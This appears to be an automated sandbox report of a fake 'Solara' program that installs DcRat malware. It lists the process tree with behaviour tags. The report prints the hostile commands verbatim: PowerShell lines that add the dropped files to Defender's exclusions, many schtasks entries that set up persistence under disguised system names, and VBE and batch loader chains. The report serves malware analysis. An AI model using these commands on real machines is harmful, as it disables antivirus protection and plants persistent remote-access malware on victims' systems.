C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:17⤵PID:3216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7440 /prefetch:17⤵PID:3372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,12981563214487157141,729733597357200191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7224 /prefetch:87⤵PID:4868
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1292
-
-
-
C:\Users\Admin\AppData\Local\Temp\solara.exe"C:\Users\Admin\AppData\Local\Temp\solara.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\oIWytMk.vbe"6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\GPEuaUZk.bat" "7⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"8⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\System.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\appcompat\Programs\RuntimeBroker.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providerWebFont\fontdrvhost.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\wininit.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\dllhost.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\browserwinsvc.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\browserwinsvc.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\wscript.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\fontdrvhost.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
C:\mswebFonthost\browserwinsvc.exe"C:\mswebFonthost\browserwinsvc.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solaradrive.exe"C:\Users\Admin\AppData\Local\Temp\Solaradrive.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\providerWebFont\rp9B7DqmQLcraqXwEvd0Obt7HxyhXRo2XNrbvC.vbe"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\providerWebFont\J8q9PLSI7w6bLMkKpRLxNzvjn.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\providerWebFont\MsPortserver.exe"C:\providerWebFont/MsPortserver.exe"7⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\emzs4c5f\emzs4c5f.cmdline"8⤵PID:4948
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD021.tmp" "c:\Users\Default\PrintHood\CSC25DBD46D212C4D49B71E9AAAB5DEE547.TMP"9⤵PID:3376
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wxkm0mmb\wxkm0mmb.cmdline"8⤵
- Drops file in Windows directory
PID:3560 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD179.tmp" "c:\Windows\appcompat\Programs\CSC14994D18C06347C195CB8530C416BFE.TMP"9⤵PID:2204
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1zekfin2\1zekfin2.cmdline"8⤵PID:740
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD438.tmp" "c:\mswebFonthost\CSC8297D948221E4563A2C4E94EC10B241.TMP"9⤵PID:380
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iq0rf13o\iq0rf13o.cmdline"8⤵PID:1996
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD61C.tmp" "c:\mswebFonthost\CSC27E4F26BD01B4C4E9219B7D8CA8C706A.TMP"9⤵PID:1640
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xe2jibbo\xe2jibbo.cmdline"8⤵PID:4064
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD68A.tmp" "c:\mswebFonthost\CSCF00588E8D7C4BC9B73848896C32C3E.TMP"9⤵PID:4012
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mlya2mfw\mlya2mfw.cmdline"8⤵PID:3272
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD6F7.tmp" "c:\mswebFonthost\CSC639A8571CF2F45AFA957FB7F3AC77CC9.TMP"9⤵PID:4288
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4gr1ljke\4gr1ljke.cmdline"8⤵PID:2476
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD793.tmp" "c:\Recovery\WindowsRE\CSC44DAA33A2154C17A41627106981B3E8.TMP"9⤵PID:4516
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tna2rxoc\tna2rxoc.cmdline"8⤵PID:3104
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7F1.tmp" "c:\mswebFonthost\CSCB9393AB4F5547128C3B72B062E1799C.TMP"9⤵PID:4392
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v31y50cs\v31y50cs.cmdline"8⤵
- Drops file in System32 directory
PID:2904 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD86E.tmp" "c:\Windows\System32\CSCFBD68506DF90496CBF5290C4B8CE8FF3.TMP"9⤵PID:2316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yk2oaInPqG.bat"8⤵PID:1252
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:1196
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:1212
-
-
C:\Users\Admin\AppData\Local\SearchApp.exe"C:\Users\Admin\AppData\Local\SearchApp.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solarascripts.exe"C:\Users\Admin\AppData\Local\Temp\Solarascripts.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\mswebFonthost\bDIv21uOAA97P6b9m4I8TmK.vbe"4⤵
- Checks computer location settings
PID:3936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\mswebFonthost\f2crKrm9LrmP.bat" "5⤵PID:3604
-
C:\mswebFonthost\Neo.exe"C:\mswebFonthost/Neo.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3916 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qdb10rmk\qdb10rmk.cmdline"7⤵PID:4684
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49.tmp" "c:\Users\Admin\AppData\Local\CSC8CADC33083804811B46846D81EA117B8.TMP"8⤵PID:2244
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\31h215sr\31h215sr.cmdline"7⤵PID:832
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4064
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6.tmp" "c:\providerWebFont\CSC1C620B4134044B4B0488E82EA1F5065.TMP"8⤵PID:4816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\InZ8ALZOsX.bat"7⤵PID:912
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:2044
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:1772
-
-
C:\Users\Admin\AppData\Local\msiexec.exe"C:\Users\Admin\AppData\Local\msiexec.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:2744
-
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Users\Default\PrintHood\System.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\System.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Users\Default\PrintHood\System.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3828
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\appcompat\Programs\RuntimeBroker.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
PID:1648
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\appcompat\Programs\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4476
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\appcompat\Programs\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3504
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\providerWebFont\fontdrvhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1892
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2188 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 8410CE6ABFBE8C75011AA3AD7E19E5DE2⤵
- Loads dropped DLL
PID:2784
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0D132079E1F9A5AEE67A98609BDB7A582⤵
- Loads dropped DLL
PID:3192
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 72D920D3E3E306A6079D0C7504E99EB7 E Global\MSI00002⤵
- Loads dropped DLL
PID:228 -
C:\Windows\SysWOW64\wevtutil.exe"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"3⤵PID:4520
-
C:\Windows\System32\wevtutil.exe"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow644⤵PID:628
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\providerWebFont\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\providerWebFont\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1640
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\mswebFonthost\wininit.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\mswebFonthost\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\mswebFonthost\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2128
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\mswebFonthost\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1512
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\mswebFonthost\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:1652
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\mswebFonthost\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "browserwinsvcb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\browserwinsvc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4672
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "browserwinsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\browserwinsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3180
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "browserwinsvcb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\browserwinsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1128
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3104
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
PID:3056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "browserwinsvcb" /sc MINUTE /mo 5 /tr "'C:\mswebFonthost\browserwinsvc.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "browserwinsvc" /sc ONLOGON /tr "'C:\mswebFonthost\browserwinsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "browserwinsvcb" /sc MINUTE /mo 10 /tr "'C:\mswebFonthost\browserwinsvc.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\mswebFonthost\wscript.exe'" /f1⤵
- Process spawned unexpected child process
PID:5060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\mswebFonthost\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 8 /tr "'C:\mswebFonthost\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\mswebFonthost\fontdrvhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\mswebFonthost\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1068
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\Local\SearchApp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4320
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\mswebFonthost\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4960
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\SearchApp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2784
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\AppData\Local\SearchApp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsPortserverM" /sc MINUTE /mo 9 /tr "'C:\providerWebFont\MsPortserver.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsPortserver" /sc ONLOGON /tr "'C:\providerWebFont\MsPortserver.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3880
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsPortserverM" /sc MINUTE /mo 5 /tr "'C:\providerWebFont\MsPortserver.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3196
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3904 -
C:\Windows\regedit.exe"C:\Windows\regedit.exe"2⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
PID:4536
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "NeoN" /sc MINUTE /mo 11 /tr "'C:\mswebFonthost\Neo.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Neo" /sc ONLOGON /tr "'C:\mswebFonthost\Neo.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3664
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "NeoN" /sc MINUTE /mo 13 /tr "'C:\mswebFonthost\Neo.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:728
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:620
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4068
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1988
